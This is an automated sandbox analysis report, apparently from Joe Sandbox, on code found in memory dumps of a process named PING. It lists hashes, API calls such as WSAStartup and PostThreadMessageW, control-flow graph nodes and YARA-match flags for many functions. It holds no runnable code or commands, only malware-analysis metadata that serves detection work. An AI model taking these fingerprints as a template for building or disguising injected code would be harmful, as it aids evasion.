                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                      • Instruction ID: 467ca5885a89a06e8346f93c23856995ca410db7e280617de4eef8bc9b732469
                                                      • Opcode Fuzzy Hash: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                      • Instruction Fuzzy Hash: D4900221601405465540B1A88C449064045ABE2211769C162A199C550D86598969566A
                                                      Function 03882FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                      • Instruction ID: 98754e57e6339d1c8da3feab59ad5b51798fd94bd5aff491a68c0ea8d89bd608
                                                      • Opcode Fuzzy Hash: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                      • Instruction Fuzzy Hash: 3A900221211C0546E600B5A84C14B07004587D1303F69C156A115C554CCA1589655526
                                                      Function 03882F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                      • Instruction ID: 9a5e7ae54196efca4ca7e01967d398c9cb77d83cc081dd5bdd903a8db43987df
                                                      • Opcode Fuzzy Hash: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                      • Instruction Fuzzy Hash: 7790026134140946E500B1984814B060045C7E2301F69C056E206C554D8719CD56612B
                                                      Function 03882EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                      • Instruction ID: 23055a8cca7b272c63115f860326fea2f4c57a42d0ac551e1039d729cebeacdd
                                                      • Opcode Fuzzy Hash: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                      • Instruction Fuzzy Hash: 6A90026120180907E540B5984C04607004587D1302F69C052A306C555E8B298D55613A
                                                      Function 03882DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                      • Instruction ID: b8e8dd9e8575d6a8236c11732db6df36f8628a343ae4da8f5e3a2ee3bf9fb237
                                                      • Opcode Fuzzy Hash: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                      • Instruction Fuzzy Hash: 35900221242446566945F1984804507404697E12417A9C053A241C950C8626995AD626
                                                      Function 03882DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 08a72708706c7824d5385e0357d9c45d59b654becba368e483c7b05cae529d02
                                                      • Instruction ID: 573fe6b1c4a2ad21a76d2e23a7b24e4cd578abf9aa29a4bda61e76e89b21937e
                                                      • Opcode Fuzzy Hash: 08a72708706c7824d5385e0357d9c45d59b654becba368e483c7b05cae529d02
                                                      • Instruction Fuzzy Hash: 4190023120140917E511B1984904707004987D1241FA9C453A142C558D97568A56A126
                                                      Function 03882D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c4f5cd264625dd611105c693652ed106fb0facbc0d8fc1f011b21564815cb059
                                                      • Instruction ID: ff0743dca03a78520e4163e6e7c7338dddfe9e78dd985cdbe81da5ebb73e3f52
                                                      • Opcode Fuzzy Hash: c4f5cd264625dd611105c693652ed106fb0facbc0d8fc1f011b21564815cb059
                                                      • Instruction Fuzzy Hash: 6090022921340506E580B198580860A004587D2202FA9D456A101D558CCA15896D5326
                                                      Function 03882D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3871862ad2ad51c7143ed302cd1b536cba111c33ae4b4286d8561ab848886681
                                                      • Instruction ID: ecb6f6c00ad718a3748361335be8eaee8720a124ac4e23b5533c2a9497061247
                                                      • Opcode Fuzzy Hash: 3871862ad2ad51c7143ed302cd1b536cba111c33ae4b4286d8561ab848886681
                                                      • Instruction Fuzzy Hash: 9990022130140507E540B19858186064045D7E2301F69D052E141C554CDA15895A5227
                                                      Function 03882CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bb9c96e714e33ab845fa417bfb45aa8218dd6b491441547e91aafd8f6a7c05a8
                                                      • Instruction ID: 9044ef1dde016291266a624f3074fab4bf7c59486113d9c9d3f41af2e7550c01
                                                      • Opcode Fuzzy Hash: bb9c96e714e33ab845fa417bfb45aa8218dd6b491441547e91aafd8f6a7c05a8
                                                      • Instruction Fuzzy Hash: E590023120140906E500B5D85808646004587E1301F69D052A602C555EC76589956136
                                                      Function 03882C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9cb6865b98aab7878426a1272e688a6a4ac3a0a4df1d445fa041704e10ce0b5f
                                                      • Instruction ID: 60321bf16c784710a33e8618fca29901c7592bfac4653b1b6d7d62330b87e1db
                                                      • Opcode Fuzzy Hash: 9cb6865b98aab7878426a1272e688a6a4ac3a0a4df1d445fa041704e10ce0b5f
                                                      • Instruction Fuzzy Hash: D090023120140D46E500B1984804B46004587E1301F69C057A112C654D8715C9557526
                                                      Function 03882C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: df98c8f25af10cc601d652f324a783b05d1c1bf3d5ddc6765eb8d62c2440d211
                                                      • Instruction ID: 1032717efb76600c593fab23a9bb096133ed81f565210b65c6d8a95ad2131918
                                                      • Opcode Fuzzy Hash: df98c8f25af10cc601d652f324a783b05d1c1bf3d5ddc6765eb8d62c2440d211
                                                      • Instruction Fuzzy Hash: 7D90023120148D06E510B198880474A004587D1301F6DC452A542C658D879589957126
                                                      Function 030915B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 657 30915b0-30915e3 658 30915eb-30915f8 call 3097860 657->658 659 30915e6 call 30817a0 657->659 662 30918be-30918c3 658->662 663 30915fe-3091648 call 30a9fd0 * 3 call 3095a50 658->663 659->658 672 309168b-3091692 663->672 673 309164a-3091661 call 30a44a0 * 2 663->673 675 3091694-309169c 672->675 676 30916b6-309170d call 30a97d0 call 30a9f40 672->676 684 3091666-3091676 673->684 675->676 679 309169e-30916a5 675->679 689 309170f-3091714 676->689 690 3091716 676->690 679->676 682 30916a7-30916ab 679->682 682->676 685 30916ad-30916b3 call 3096660 682->685 684->672 687 3091678-309167f 684->687 685->676 687->675 691 3091681-3091688 call 3095bd0 687->691 693 3091718-3091734 call 30a9f10 689->693 690->693 691->672 698 309173a 693->698 699 3091843-309189f call 3087920 call 30943e0 call 30814a0 call 30a1260 693->699 701 3091740-3091749 698->701 720 30918af-30918b0 call 30a6d10 699->720 721 30918a1-30918ad WSAStartup 699->721 703 309174f-309176c call 30a9f40 701->703 704 3091837-309183d 701->704 710 309176e-3091775 703->710 711 3091777 703->711 704->699 704->701 712 3091779-3091787 710->712 711->712 714 3091789 712->714 715 309179e-30917c9 call 30942e0 call 30a9f40 712->715 717 3091790-3091793 714->717 730 30917cb-30917d0 715->730 731 30917d2 715->731 722 309179c 717->722 723 3091795-3091798 717->723 728 30918b5-30918b8 720->728 721->720 722->715 723->717 726 309179a 723->726 726->715 728->662 732 30917d4-30917da 730->732 731->732 733 30917dc 732->733 734 30917ee-3091834 call 30942e0 call 30a9f10 * 2 732->734 736 30917e0-30917e3 733->736 734->704 738 30917ec 736->738 739 30917e5-30917e8 736->739 738->734 739->736 741 30917ea 739->741 741->734
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: n$n
                                                      • API String ID: 724789610-3874132673
                                                      • Opcode ID: 864ae63fd1b04445733242d9d2239697806cd385ddb5e7526365e03ca3a2d9a6
                                                      • Instruction ID: ce29681ecf0e23e93118e304e2b477a3897de109b61a7cfc0be8f664c9c8d351
                                                      • Opcode Fuzzy Hash: 864ae63fd1b04445733242d9d2239697806cd385ddb5e7526365e03ca3a2d9a6
                                                      • Instruction Fuzzy Hash: D8916E75E0230AABEF14DFA9DC40BEEF7F4AF84304F08416AE518AB280E7746545DB95
                                                      Function 030915AF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 745 30915af-30915e6 call 30817a0 747 30915eb-30915ee call 3097860 745->747 749 30915f3-30915f8 747->749 750 30918be-30918c3 749->750 751 30915fe-3091626 call 30a9fd0 * 3 749->751 757 309162b-3091633 call 3095a50 751->757 759 3091638-3091648 757->759 760 309168b-3091692 759->760 761 309164a-3091661 call 30a44a0 * 2 759->761 763 3091694-309169c 760->763 764 30916b6-309170d call 30a97d0 call 30a9f40 760->764 772 3091666-3091676 761->772 763->764 767 309169e-30916a5 763->767 777 309170f-3091714 764->777 778 3091716 764->778 767->764 770 30916a7-30916ab 767->770 770->764 773 30916ad-30916b3 call 3096660 770->773 772->760 775 3091678-309167f 772->775 773->764 775->763 779 3091681-3091688 call 3095bd0 775->779 781 3091718-3091734 call 30a9f10 777->781 778->781 779->760 786 309173a 781->786 787 3091843-309189f call 3087920 call 30943e0 call 30814a0 call 30a1260 781->787 789 3091740-3091749 786->789 808 30918af-30918b0 call 30a6d10 787->808 809 30918a1-30918ad WSAStartup 787->809 791 309174f-309176c call 30a9f40 789->791 792 3091837-309183d 789->792 798 309176e-3091775 791->798 799 3091777 791->799 792->787 792->789 800 3091779-3091787 798->800 799->800 802 3091789 800->802 803 309179e-30917c9 call 30942e0 call 30a9f40 800->803 805 3091790-3091793 802->805 818 30917cb-30917d0 803->818 819 30917d2 803->819 810 309179c 805->810 811 3091795-3091798 805->811 816 30918b5-30918b8 808->816 809->808 810->803 811->805 814 309179a 811->814 814->803 816->750 820 30917d4-30917da 818->820 819->820 821 30917dc 820->821 822 30917ee-3091834 call 30942e0 call 30a9f10 * 2 820->822 824 30917e0-30917e3 821->824 822->792 826 30917ec 824->826 827 30917e5-30917e8 824->827 826->822 827->824 829 30917ea 827->829 829->822
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: n$n
                                                      • API String ID: 724789610-3874132673
                                                      • Opcode ID: 66eda3ba223267216c3584d54d487aacb19cf11e24d29ae0718b5a1bc38a6bfe
                                                      • Instruction ID: a04703b9c2f443960fe2178d4c3ee829284aa80ac491e19f947456ccc9cb6769
                                                      • Opcode Fuzzy Hash: 66eda3ba223267216c3584d54d487aacb19cf11e24d29ae0718b5a1bc38a6bfe
                                                      • Instruction Fuzzy Hash: 5D915E75E0230AAAEF14DFA4DC40BEEFBF4BF44304F08416AE518AB280E7746645DB95
                                                      Function 030909F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 833 30909f5-3090a23 835 3090a39-3090a3b 833->835 836 3090a3c-3090a40 835->836 837 3090a72-3090a80 835->837 836->835 838 3090a41 836->838 839 3090a89-3090ade call 30aa9a0 call 30943e0 call 3081410 call 30a1260 837->839 840 3090a84 call 30a9f90 837->840 838->835 841 3090a43-3090a48 838->841 858 3090b00-3090b05 839->858 859 3090ae0-3090af1 PostThreadMessageW 839->859 840->839 843 3090a4a-3090a51 841->843 844 30909dd-30909df 841->844 848 3090a54-3090a5b 843->848 846 30909e1-30909f4 844->846 847 3090977-3090996 844->847 846->833 852 3090998-309099a 847->852 853 30909cc-30909d3 847->853 848->848 850 3090a5d-3090a67 848->850 852->853 859->858 860 3090af3-3090afd 859->860 860->858
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 0-340756553
                                                      • Opcode ID: 301362c7bffaf120ec22be39ef473cf97d063a67ee710c56270974ecc65845ad
                                                      • Instruction ID: 6316baab5c6431d7e029839ab2bc8619bb1f80ad9757a210da02a44241553073
                                                      • Opcode Fuzzy Hash: 301362c7bffaf120ec22be39ef473cf97d063a67ee710c56270974ecc65845ad
                                                      • Instruction Fuzzy Hash: BC31BD36D1628579EF11DBA48C02FEEBFB8AF82B54F184195E4906F282E371810BD791
                                                      Function 03090A69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 03090AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: adb99a747ee0173144351944a3aea06e0caa808d67b3353b1515557d49777c68
                                                      • Instruction ID: 011760a9fff12db20668ca1674713b8504582f3fa962db36eb6025c29663a118
                                                      • Opcode Fuzzy Hash: adb99a747ee0173144351944a3aea06e0caa808d67b3353b1515557d49777c68
                                                      • Instruction Fuzzy Hash: AC11E135D422187AEB10D7D49C02FDFBBBC9F81B54F048055FA107F181D6B896068BE5
                                                      Function 03090A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 03090AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: a19ed30b372ccc3978bf95177a500fb0141124a91b4e8ac7ac76e96e21972863
                                                      • Instruction ID: fd825d5cc0df19a16bb411b17f2af4317c80b189c4698b803b6c90845da08112
                                                      • Opcode Fuzzy Hash: a19ed30b372ccc3978bf95177a500fb0141124a91b4e8ac7ac76e96e21972863
                                                      • Instruction Fuzzy Hash: 3201A135D4231876EB10E6E49C02FDFBBBC9F80B54F048055FA147B180D6B4A60687E5
                                                      Function 030A2B40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 030A2C0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: b971afcb3b89c605de9ed16204a7664e381b6f7793a855666e67b2e923255485
                                                      • Instruction ID: c7bb1cca21837dd7343beaeedefa1a6f7d1671e211fc0e9cbae817e8f8e2ba32
                                                      • Opcode Fuzzy Hash: b971afcb3b89c605de9ed16204a7664e381b6f7793a855666e67b2e923255485
                                                      • Instruction Fuzzy Hash: 1031AFB5602704BBD718DFA5D880FE7BBACFB88704F00862DAA5D5B245D770B644CBA4
                                                      Function 0309EBB5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0309EBD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 65ce5571bb56d23527fffbb061ed3477e7383b67b672a4a08ca559f876bcf21e
                                                      • Instruction ID: 7572d89ace6d0b4352da2fa6fd7d073d07fb7622d6cf8a9d734e257f3245f939
                                                      • Opcode Fuzzy Hash: 65ce5571bb56d23527fffbb061ed3477e7383b67b672a4a08ca559f876bcf21e
                                                      • Instruction Fuzzy Hash: 68314FB6A00609EFDF00DFD8D8809EEB7B9FF88304B148559E505AB254D775AE05CBA1
                                                      Function 0309EBC0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0309EBD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 28f74375f10a066a86184a4012e5dd8ca27dcc73e77849bdc73188b64a37b19d
                                                      • Instruction ID: 62f51a22805692eacd145e92ca6c88af1186f15d035ebcc3c60daacf0dabf280
                                                      • Opcode Fuzzy Hash: 28f74375f10a066a86184a4012e5dd8ca27dcc73e77849bdc73188b64a37b19d
                                                      • Instruction Fuzzy Hash: 1E312DB6A0060AAFDF00DFD8D8809EEB7B9BF88304B148559E515AB254D775EE05CBA0
                                                      Function 03097D70 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?), ref: 03097D4C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 150430a16d506f708fce41dfff296d796d73cb163f1e46f6867a1b050da2145f
                                                      • Instruction ID: e7786b79ad8484bfcc0e1908affd3798d9a1c41788168af900b5e81847871153
                                                      • Opcode Fuzzy Hash: 150430a16d506f708fce41dfff296d796d73cb163f1e46f6867a1b050da2145f
                                                      • Instruction Fuzzy Hash: 3E21BB326263009FEB24DEB8DC413F1FBF49F55E20F08426ED4A84B186D631844AE690
                                                      Function 0309180D Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 030918AD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID:
                                                      • API String ID: 724789610-0
                                                      • Opcode ID: 5f9345cbed8a27ee8afd49a1a69134a08e40f7e2a07e9e25ae462c66cb8e88de
                                                      • Instruction ID: eb89776281f953029f03e74943cce948f2e1cf3d8828408a711f53f4a4b050b8
                                                      • Opcode Fuzzy Hash: 5f9345cbed8a27ee8afd49a1a69134a08e40f7e2a07e9e25ae462c66cb8e88de
                                                      • Instruction Fuzzy Hash: 81110B75D4131AAFDB01DBE88C40BEFF7B8EF89200F048156D958AB142D7346606C7D5
                                                      Function 03097B69 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030918F0,030A6D77,030A4657,?), ref: 03097B63
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
                                                      • Instruction ID: 2a0e0164da82e817a6b7ef09764ba1d3131c10f27667234e60c1e78a4e61d495
                                                      • Opcode Fuzzy Hash: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
